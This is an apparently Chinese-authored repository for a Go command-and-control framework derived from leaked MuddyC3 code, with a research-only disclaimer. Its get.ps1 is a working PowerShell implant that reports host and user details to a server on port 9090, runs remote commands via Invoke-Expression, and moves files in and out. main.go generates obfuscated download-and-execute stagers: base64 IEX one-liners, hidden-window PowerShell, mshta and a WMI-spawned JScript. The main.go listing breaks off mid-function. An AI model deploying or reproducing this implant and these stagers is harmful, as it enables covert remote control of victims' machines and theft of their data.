├── Modules
└── calc-test.ps1
├── bin
├── donut.exe
├── load.exe
├── 使用.txt
├── NET_load.exe
└── run.bat
├── .gitignore
├── muddyc3-Revived.zip
├── go.mod
├── README.md
├── README.md.bak
├── get.ps1
├── go.sum
└── main.go
/Modules/calc-test.ps1:
--------------------------------------------------------------------------------
1 | function calc-test
2 | {
3 | start-process calc
4 | }
--------------------------------------------------------------------------------
/bin/donut.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/donut.exe
--------------------------------------------------------------------------------
/bin/load.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/load.exe
--------------------------------------------------------------------------------
/bin/使用.txt:
--------------------------------------------------------------------------------
1 | 测试文件 警告
2 | 运行run.bat输入ip
3 | 生成.bin文件
4 | 可以用load.exe加载.bin文件
5 |
6 | 这是测试中的测试
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | /.idea
2 | /run.bat
3 | /test.go
4 | /main.exe
5 | /test.py
6 | /test1.go
7 | /NET_load
--------------------------------------------------------------------------------
/bin/NET_load.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/bin/NET_load.exe
--------------------------------------------------------------------------------
/muddyc3-Revived.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/demonsec666/muddyc3_golang/HEAD/muddyc3-Revived.zip
--------------------------------------------------------------------------------
/bin/run.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | echo.set ip
3 | set /p input_source=
4 | donut.exe NET_load.exe -c NET_load.Program -m Main -p input_source
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module github.com/demonsec666/muddyc3_golang
2 |
3 | go 1.12
4 |
5 | require (
6 | github.com/AlecAivazis/survey/v2 v2.0.5 // indirect
7 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 // indirect
8 | github.com/c-bata/go-prompt v0.2.3 // indirect
9 | github.com/fatih/color v1.9.0 // indirect
10 | github.com/mattn/go-tty v0.0.3 // indirect
11 | github.com/olekukonko/tablewriter v0.0.4 // indirect
12 | github.com/pkg/term v0.0.0-20190109203006-aa71e9d9e942 // indirect
13 | )
14 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # muddyc3_golang
2 | 本项目是根据泄漏的ahmedkhlief MuddyC3 C2的POC使用golang编写的框架。原版框架地址:[muddyc3-Revived](https://github.com/ahmedkhlief/muddyc3-Revived)
3 | Demo请见:[Youtube](https://youtu.be/NWwOFiBzNXk)
4 |
5 | #WIKI
6 | https://github.com/demonsec666/muddyc3_golang/wiki
7 |
8 | #release
9 | https://github.com/demonsec666/muddyc3_golang/releases
10 |
11 |
12 | #主要功能
13 | 1. 交互式命令行
14 | 2. 可加载模块
15 | 3. 创建Windows PowerShell负载
16 | 4. 远程上传下载功能
17 |
18 | # 框架运行图片
19 | ![][1]
20 | ![][2]
21 | ![][3]
22 | ![][4]
23 | ![][5]
24 | ![][6]
25 |
26 | # 开发人员名单
27 | + [WBGIII](https://github.com/WBGlIl)
28 | + [demonsec666](https://github.com/demonsec666)
29 | + [c4dr01d](https://github.com/c4dr01d)
30 |
31 | # 关于框架使用
32 | 本框架仅供网络安全学习、参考以及合法测试,不合理使用本项目所提供之功能而造成的任何直接或间接的后果以及损失,均由使用者承担,即刻安全以及参加本项目的开发者不为此承担任何责任。
33 |
34 | This framework just use for cyber security research, reference and legitimate testing only.
35 | Any direct or indirect consequences and losses arising from the abuse of the features provided by this framework are due to the user himself, secist and author of this framework does not accept any responsibility.
36 |
37 | [1]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/B49CE57927F122B7EA4921F47F321D77.jpg
38 | [2]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CA7F0BB98761EF4426EB1D7FA7E223CD.jpg
39 | [3]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/9311DF125870D1C86BF186D5AA8C532C.jpg
40 | [4]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/2CA777D7D57FFD6C177C9261523B601E.jpg
41 | [5]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CD10755C877B212D160EBE7762FA7297.jpg
42 | [6]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/1580572393517.jpg
43 |
--------------------------------------------------------------------------------
/README.md.bak:
--------------------------------------------------------------------------------
1 | # 1.Python版
2 |
3 | Python 版 开源项目 https://github.com/ahmedkhlief/muddyc3-Revived
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | # 2.golang版
12 |
13 | golang 版 开源项目 https://github.com/demonsec666/muddyc3_golang
14 |
15 | 这是根据泄漏的ahmedkhlief MuddyC3 C2的工作POC。现在包括以下功能:
16 |
17 | 作者: WBGIII
18 |
19 |
20 |
21 | 蹭饭系列作者: Demon666
22 |
23 | ![enter description here][1]
24 |
25 | #
26 |
27 | ## 1.代理重新连接
28 |
29 | ![enter description here][2]
30 |
31 |
32 |
33 | ## 2. 加载模块
34 |
35 | ![enter description here][3]
36 |
37 | ## 3. 发送命令和接收结果
38 |
39 |
40 |
41 | ## 4. 创建Powershell负载 ----(已实现一半,还未增加到服务端)目前只有get.ps1 代码复制到客户端,进行测试
42 |
43 |
44 |
45 | ## 5.已实现Download 功能,但待修复upload功能(有部分bug)
46 |
47 | ![enter description here][4]
48 |
49 | ## 已更新增加
50 | ```
51 | 1. help
52 | 2. info
53 | 3. exit
54 | 4. Interact with AGENT
55 | 5. session list
56 |
57 |
58 | ```
59 |
60 | ![enter description here][5]
61 |
62 |
63 | ![enter description here][6]
64 |
65 |
66 |
67 |
68 |
69 | [Demo](https://youtu.be/NWwOFiBzNXk)
70 |
71 | ## 待增加功能版:
72 |
73 | ```
74 | 需修复upload bug
75 |
76 |
77 |
78 |
79 |
80 | ```
81 |
82 |
83 |
84 | ## 用法:
85 |
86 | ```
87 | 1. go get github.com/axgle/mahonia go get github.com/olekukonko/tablewriter
88 | 2. go run main (PORT:9090)
89 | 3. 复制get.ps1 代码到客户端 (并修改ip和端口)
90 | 4. 在控制可直接输入命令
91 | 5. 或者在控制输入 load xxxx.ps1 or Download serverfile clientfile
92 | 6. load 即加载 moudle文件中的文件
93 | 7. Donwload 需创建file文件,再使用命令Download serverfile(指的是file下的文件 相对路径) clientfile (客户端的绝对路径)
94 | ```
95 |
96 |
97 |
98 | # 敬告(Notice):
99 | + 仅供学习参考,做测试
100 |
101 | + 不合理使用此项目所提供的功能而造成的任何直接或者间接的后果及损失, 均由使用者本人负责,即刻安全以及创作者不为此承担任何责任。
102 |
103 |
104 | + For reference only, for testing
105 |
106 | + Any direct or indirect consequences and losses arising from the abuse of the featuress provided by those project are due to the user himself, secist and the author does not accept any responsibility.
107 |
108 |
109 | [1]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/B49CE57927F122B7EA4921F47F321D77.jpg
110 | [2]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CA7F0BB98761EF4426EB1D7FA7E223CD.jpg
111 | [3]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/9311DF125870D1C86BF186D5AA8C532C.jpg
112 | [4]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/2CA777D7D57FFD6C177C9261523B601E.jpg
113 | [5]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/CD10755C877B212D160EBE7762FA7297.jpg
114 | [6]: https://demonsec666.oss-cn-qingdao.aliyuncs.com/1580572393517.jpg
--------------------------------------------------------------------------------
/get.ps1:
--------------------------------------------------------------------------------
1 | $hostname = $env:COMPUTERNAME;
2 | $whoami = $env:USERNAME;
3 | $arch = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
4 | $os = (Get-WmiObject -class Win32_OperatingSystem).Caption;
5 | $domain = (Get-WmiObject Win32_ComputerSystem).Domain;
6 | $IP = (gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True").IPAddress[0]
7 | $random = -join ((65 .. 90) | Get-Random -Count 5 | % { [char]$_ });
8 | $agent = "$random-img.jpeg"
9 | $finaldata = "$os**$IP**$arch**$hostname**$domain**$whoami"
10 | $h3 = new-object net.WebClient
11 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded")
12 | $h = $h3.UploadString("http://{ip}:9090/info/$agent", "data="+$finaldata)
13 |
14 | $h2 = New-Object system.Net.WebClient;
15 | $h3 = New-Object system.Net.WebClient;
16 |
17 |
18 | function load($module)
19 | {
20 |
21 |
22 |
23 | $handle = new-object net.WebClient;
24 | $handleh = $handle.Headers;
25 | $handleh.add("Content-Type", "application/x-www-form-urlencoded");
26 | $modulecontent = $handle.UploadString("http://{ip}:9090/md/$agent", "data="+"$module");
27 |
28 |
29 |
30 | return $modulecontent
31 | }
32 |
33 | function Download($file)
34 | {
35 |
36 |
37 |
38 | $handle = new-object net.WebClient;
39 | $handleh = $handle.Headers;
40 | $handleh.add("Content-Type", "application/x-www-form-urlencoded");
41 | $modulecontent = $handle.UploadString("http://{ip}:9090/up/$agent", "data="+"$file");
42 | return $modulecontent
43 | }
44 |
45 | function upload($file)
46 | {
47 |
48 |
49 |
50 | $handle = new-object net.WebClient;
51 | $handleh = $handle.Headers;
52 | $handleh.add("Content-Type", "application/x-www-form-urlencoded");
53 | $modulecontent = $handle.UploadString("http://{ip}:9090/img/$agent", "data="+"$file");
54 | return $modulecontent
55 | }
56 |
57 |
58 | while ($true)
59 | {
60 | $cmd = $h2.downloadString("http://{ip}:9090/cm/$agent");
61 | #echo $cmd
62 | if ($cmd -eq "REGISTER")
63 | {
64 | $h3 = new-object net.WebClient
65 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded")
66 | $h3.UploadString("http://{ip}:9090/info/$agent", "data="+$finaldata)
67 | continue
68 | }
69 | if ($cmd -eq "")
70 | {
71 | sleep 2
72 | continue
73 | }
74 | elseif ($cmd.split(" ")[0] -eq "load")
75 | {
76 | $f = $cmd.split(" ")[1]
77 | $module = load -module $f
78 | try
79 | {
80 | $output = Invoke-Expression ($module) | Out-String
81 | }
82 | catch
83 | {
84 | $output = $Error[0] | Out-String;
85 | }
86 |
87 |
88 | }
89 | elseif ($cmd.split(" ")[0] -eq "download")
90 | {
91 | try
92 | {
93 | $file = $cmd.split(" ")[1]
94 | echo $file
95 | $path = $cmd.split(" ")[2]
96 | echo $path
97 | $filedata=Download -file $file
98 | $bytes = [Convert]::FromBase64String($filedata)
99 | [IO.File]::WriteAllBytes($path, $bytes)
100 | $output="download file to $path"
101 | }
102 | catch
103 | {
104 | $output = "err download file"
105 | }
106 |
107 | }
108 | elseif ($cmd.split(" ")[0] -eq "upload")
109 | {
110 | try
111 | {
112 | $path = $cmd.split(" ")[1]
113 | #echo $file
114 | $filedata=[IO.File]::ReadAllBytes($path)
115 | $bytes = [Convert]::ToBase64String($filedata)
116 | echo $bytes
117 | $output=upload -file $bytes
118 | }
119 | catch
120 | {
121 | $output = "err upload file"
122 | }
123 |
124 | }
125 |
126 | else
127 | {
128 |
129 | try
130 | {
131 | $output = Invoke-Expression ($cmd) | Out-String
132 | }
133 | catch
134 | {
135 | #$output = $Error[0] | Out-String;
136 | }
137 | }
138 | #Echo $output
139 | $bytes = [System.Text.Encoding]::UTF8.GetBytes($output)
140 | $redata = [System.Convert]::ToBase64String($bytes)
141 | $h3.Headers.Add("Content-Type", "application/x-www-form-urlencoded")
142 | $re = $h3.UploadString("http://{ip}:9090/re/$agent", "data="+$redata);
143 |
144 | }
145 |
146 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/AlecAivazis/survey/v2 v2.0.5 h1:xpZp+Q55wi5C7Iaze+40onHnEkex1jSc34CltJjOoPM=
2 | github.com/AlecAivazis/survey/v2 v2.0.5/go.mod h1:WYBhg6f0y/fNYUuesWQc0PKbJcEliGcYHB9sNT3Bg74=
3 | github.com/Netflix/go-expect v0.0.0-20180615182759-c93bf25de8e8/go.mod h1:oX5x61PbNXchhh0oikYAH+4Pcfw5LKv21+Jnpr6r6Pc=
4 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ=
5 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg=
6 | github.com/c-bata/go-prompt v0.2.3 h1:jjCS+QhG/sULBhAaBdjb2PlMRVaKXQgn+4yzaauvs2s=
7 | github.com/c-bata/go-prompt v0.2.3/go.mod h1:VzqtzE2ksDBcdln8G7mk2RX9QyGjH+OVqOCSiVIqS34=
8 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
9 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s=
10 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU=
11 | github.com/hinshun/vt10x v0.0.0-20180616224451-1954e6464174/go.mod h1:DqJ97dSdRW1W22yXSB90986pcOyQ7r45iio1KN2ez1A=
12 | github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs=
13 | github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8=
14 | github.com/kr/pty v1.1.4/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
15 | github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
16 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
17 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
18 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
19 | github.com/mattn/go-isatty v0.0.10/go.mod h1:qgIWMr58cqv1PHHyhnkY9lrL7etaEgOFcMEpPG5Rm84=
20 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM=
21 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE=
22 | github.com/mattn/go-runewidth v0.0.6/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
23 | github.com/mattn/go-runewidth v0.0.7 h1:Ei8KR0497xHyKJPAv59M1dkC+rOZCMBJ+t3fZ+twI54=
24 | github.com/mattn/go-runewidth v0.0.7/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
25 | github.com/mattn/go-tty v0.0.3 h1:5OfyWorkyO7xP52Mq7tB36ajHDG5OHrmBGIS/DtakQI=
26 | github.com/mattn/go-tty v0.0.3/go.mod h1:ihxohKRERHTVzN+aSVRwACLCeqIoZAWpoICkkvrWyR0=
27 | github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4=
28 | github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
29 | github.com/olekukonko/tablewriter v0.0.4 h1:vHD/YYe1Wolo78koG299f7V/VAS08c6IpCLn+Ejf/w8=
30 | github.com/olekukonko/tablewriter v0.0.4/go.mod h1:zq6QwlOf5SlnkVbMSr5EoBv3636FWnp+qbPhuoO21uA=
31 | github.com/pkg/term v0.0.0-20190109203006-aa71e9d9e942/go.mod h1:eCbImbZ95eXtAUIbLAuAVnBnwf83mjf6QIVH8SHYwqQ=
32 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
33 | github.com/stretchr/testify v1.2.1/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
34 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
35 | golang.org/x/crypto v0.0.0-20190530122614-20be4c3c3ed5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
36 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
37 | golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
38 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
39 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
40 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
41 | golang.org/x/sys v0.0.0-20190530182044-ad28b68e88f1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
42 | golang.org/x/sys v0.0.0-20191008105621-543471e840be/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
43 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
44 | golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
45 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
46 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "bufio"
5 | "encoding/base64"
6 | "fmt"
7 | "io/ioutil"
8 | "math/rand"
9 | "net/http"
10 | "os"
11 | "os/exec"
12 | "regexp"
13 | "runtime"
14 | "strings"
15 | "time"
16 |
17 | "github.com/AlecAivazis/survey/v2"
18 | "github.com/fatih/color"
19 | "github.com/olekukonko/tablewriter"
20 |
21 | "github.com/axgle/mahonia" //中文编码
22 | "github.com/c-bata/go-prompt" // 增加tab 下拉菜单
23 | )
24 |
25 | const help_shell = `
26 | help Help menu
27 | info List os Info
28 | load load Moudle ps1 file
29 | upload upload info
30 | back return Home
31 | exit Uninstall client
32 | `
33 | const help = `
34 | help Help menu
35 | set Host Setting IP address
36 | session list List os Info
37 | Interact Use session ID
38 | shell Shell => powershell.exe
39 | exit Exit the program
40 | `
41 |
42 | var (
43 | OS, Arch, IP, hostname, domain, username string // func info_os() 表格变量
44 | cmd = ""
45 | AGENTS map[string]string
46 | session_id = ""
47 | Host = ""
48 | back = ""
49 | code = `
50 |
51 |
52 |
110 |
111 |
112 |
113 |
114 | `
115 | //全局变量
116 | )
117 |
118 | func GetRandomString(l int) string {
119 | str := "0123456789abcdefghijklmnopqrstuvwxyz"
120 | bytes := []byte(str)
121 | result := []byte{}
122 | r := rand.New(rand.NewSource(time.Now().UnixNano()))
123 | for i := 0; i < l; i++ {
124 | result = append(result, bytes[r.Intn(len(bytes))])
125 | }
126 | return string(result)
127 | }
128 |
129 | func replace(web_data string) string {
130 | reg, _ := regexp.Compile(" ")
131 | data := reg.ReplaceAllString(web_data, "+")
132 | return data
133 | }
134 | func str_replace(data string, reg_str string, str string) string {
135 | reg, _ := regexp.Compile(reg_str)
136 | str_data := reg.ReplaceAllString(data, str)
137 | return str_data
138 | }
139 |
140 | func httpserver(w http.ResponseWriter, r *http.Request) {
141 | //r.Body = http.MaxBytesReader(w, r.Body, MaxFileSize)
142 | r.ParseForm()
143 |
144 | //url正则
145 | url_info, _ := regexp.Compile("/info/*")
146 | url_md, _ := regexp.Compile("/md/*")
147 | url_cm, _ := regexp.Compile("/cm/*")
148 | url_re, _ := regexp.Compile("/re/*")
149 | url_up, _ := regexp.Compile("/up/*")
150 | url_img, _ := regexp.Compile("/img/*")
151 | url_get, _ := regexp.Compile("/get")
152 | url_hjf, _ := regexp.Compile("/hjf")
153 |
154 | //info
155 | if url_info.MatchString(r.URL.Path) {
156 | data := mahonia.NewDecoder("gbk").ConvertString(string(r.Form.Get("data")))
157 | url_path, _ := regexp.Compile(`[A-Z]+`)
158 | id := url_path.FindString(r.URL.Path)
159 | AGENTS[id] = data
160 | fmt.Println(data)
161 |
162 | //md执行命令 md=> Execute system command
163 | } else if url_cm.MatchString(r.URL.Path) {
164 | url_path, _ := regexp.Compile(`[A-Z]+`)
165 | var id = url_path.FindString(r.URL.Path)
166 | //fmt.Println(id)
167 | //两点一判断id是否存在
168 | //二判断请求id是否是设置的id
169 | /*
170 | 在进入判断是否是设置的id
171 | */
172 | _, ok := AGENTS[id]
173 | if ok {
174 | if id == session_id {
175 | if cmd != "" {
176 | fmt.Fprint(w, cmd)
177 | cmd = ""
178 | _ = r.Close
179 | } else {
180 | fmt.Fprint(w, "")
181 | }
182 | } else {
183 | fmt.Fprint(w, "")
184 | }
185 | } else {
186 | fmt.Fprintf(w, "REGISTER")
187 | }
188 |
189 | //re接收返回信息
190 | } else if url_re.MatchString(r.URL.Path) {
191 | web_data := r.PostFormValue("data")
192 | decoded, _ := base64.StdEncoding.DecodeString(replace(web_data))
193 | decodestr := string(decoded)
194 | fmt.Println(decodestr)
195 |
196 | //load加载ps模块 re=> load moudle powershell file
197 | } else if url_md.MatchString(r.URL.Path) {
198 | web_data := r.Form.Get("data")
199 | file_data, err := ioutil.ReadFile("./Modules/" + web_data)
200 | if err != nil {
201 | fmt.Println("Error reading module file", err)
202 | fmt.Fprintf(w, "")
203 | return
204 | } else {
205 | fmt.Fprintf(w, string(file_data))
206 | }
207 |
208 | //up客户端下载文件 up=> download file to Client
209 | } else if url_up.MatchString(r.URL.Path) {
210 | web_data := r.Form.Get("data")
211 | file_data, err := ioutil.ReadFile("./file/" + web_data)
212 | if err != nil {
213 | fmt.Println("Read file error", err)
214 | fmt.Fprintf(w, "")
215 | return
216 | } else {
217 | encodeString := base64.StdEncoding.EncodeToString(file_data)
218 | fmt.Fprintf(w, encodeString)
219 | }
220 |
221 | //img上传文件到服务端 img=> upload file to server
222 | } else if url_img.MatchString(r.URL.Path) {
223 | web_data := r.Form.Get("data")
224 | decoded, _ := base64.StdEncoding.DecodeString(replace(web_data))
225 | //decodestr := string(decoded)
226 |
227 | file, _ := os.Create("./upload/" + GetRandomString(5))
228 | file.Write(decoded)
229 | file.Close()
230 | fmt.Fprintf(w, "ok upload")
231 |
232 | } else if url_get.MatchString(r.URL.Path) {
233 | //get payload get.PS1
234 | ps1, err := ioutil.ReadFile("./get.ps1")
235 | payload := strings.Replace(string(ps1), "{ip}", Host, -1)
236 | if err != nil {
237 | fmt.Println("Read file error", err)
238 | fmt.Fprintln(w, "")
239 | return
240 | } else {
241 | fmt.Fprintln(w, payload)
242 | }
243 | } else if url_hjf.MatchString(r.URL.Path) {
244 | js := `
245 |
246 | var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://{ip}:{port}/get'));";
247 | var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');
248 | w32ps.SpawnInstance_();
249 | w32ps.ShowWindow=0;
250 | var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null);
251 | `
252 | js = str_replace(js, `{ip}`, Host)
253 | js = str_replace(js, `{port}`, "9090")
254 | js = base64.StdEncoding.EncodeToString([]byte(js))
255 | js = str_replace(js, `\n`, "")
256 | reg := map[string]string{
257 | "]": "=",
258 | "[": "a",
259 | ",": "b",
260 | "@": "D",
261 | "-": "x",
262 | "~": "N",
263 | "*": "E",
264 | "%": "C",
265 | "$": "H",
266 | "!": "G",
267 | "{": "K",
268 | "}": "O",
269 | }
270 | for k, v := range reg {
271 | js = str_replace(js, v, k)
272 | }
273 | code = strings.Replace(code, `{code}`, js, 1)
274 | //fmt.Print(code)
275 | fmt.Fprint(w, code)
276 | } else {
277 | fmt.Fprintf(w, "")
278 | }
279 | }
280 |
281 | //打印全部主机信息 Print all host information
282 | func info_os() {
283 |
284 | for k, v := range AGENTS {
285 | info := strings.Split(v, "**")
286 | OS = info[0]
287 | IP = info[1]
288 | Arch = info[2]
289 | hostname = info[3]
290 | domain = info[4]
291 | username = info[5]
292 | //定义 info 信息中的变量 Define variables in info
293 | data := [][]string{
294 | {k, OS, IP, Arch, hostname, domain, username},
295 | }
296 | //将info信息做成表格 Information Form
297 | table := tablewriter.NewWriter(os.Stdout)
298 | table.SetHeader([]string{"ID", "Os Version", "IP Address ", "x86 OR x64", "ComputerName", "domain", "Username"})
299 |
300 | for _, v := range data {
301 | table.Append(v)
302 | }
303 | table.Render() // Send output
304 | }
305 |
306 | }
307 |
308 | //---------------------------------------------------------------
309 | func Hosts() {
310 |
311 | Blue := color.New(color.FgBlue).SprintFunc() //颜色设定 https://github.com/fatih/color
312 | red := color.New(color.FgRed).SprintFunc()
313 |
314 | prompt := &survey.Input{
315 | Message: "set ip",
316 | }
317 |
318 | survey.AskOne(prompt, &Host, survey.WithIcons(func(icons *survey.IconSet) {
319 |
320 | icons.Question.Text = "メ "
321 | icons.Question.Format = "red+hb"
322 |
323 | }))
324 | fmt.Printf("%s setting listener => %s:9090 \n", Blue("[*]"), Host) //https://github.com/fatih/color
325 | fmt.Println("\n")
326 | payload := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/get');IEX($s)"
327 |
328 | strbytes := []byte(payload)
329 | encoded := base64.StdEncoding.EncodeToString(strbytes)
330 | // fmt.Println(encoded)
331 | command := "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))}"
332 | fmt.Printf("%s %s \n", red("[+]"), command)
333 | fmt.Println("\n")
334 |
335 | command = "Start-Process powershell -ArgumentList " + "\"iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))\"" + " -WindowStyle Hidden"
336 | fmt.Printf("%s %s \n", red("[+]"), command)
337 | fmt.Println("\n")
338 |
339 | command = "mshta http://" + Host + ":9090/hjf"
340 | fmt.Printf("%s %s \n", red("[+]"), command)
341 | fmt.Println("\n")
342 |
343 | //---------------------------------------------------------------
344 | payload_JOB := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/get');IEX($s)"
345 |
346 | strbytes_JOB := []byte(payload_JOB)
347 | encoded_JOB := base64.StdEncoding.EncodeToString(strbytes_JOB)
348 | //---------------------------------------------------------------
349 | commandJ := "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded_JOB + "')))}"
350 | //commandF = commandJ
351 | fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell JOB Payload+---")
352 | fmt.Printf("%s %s \n", red("[+]"), commandJ)
353 | fmt.Println("\n")
354 | //---------------------------------------------------------------
355 | commandP := "Start-Process powershell -ArgumentList " + "\"iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))\"" + " -WindowStyle Hidden"
356 | fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell New Process Payload+---")
357 | fmt.Printf("%s %s \n", red("[+]"), commandP)
358 | fmt.Println("\n")
359 | //---------------------------------------------------------------
360 | commandF_IP := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/hjf');IEX($s)"
361 | commandF_strbytes := []byte(commandF_IP)
362 | commandF_encoded := base64.StdEncoding.EncodeToString(commandF_strbytes)
363 | commandF := "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + commandF_encoded + "')))"
364 | fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell JOB + File Payload+---")
365 | fmt.Printf("%s %s \n", red("[+]"), commandF)
366 | fmt.Println("\n")
367 | //---------------------------------------------------------------
368 | simple_payload := "powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');Invoke-Expression $h;\""
369 |
370 | simple_payload2 := "powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');\""
371 | simple_payload3 := "powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');\""
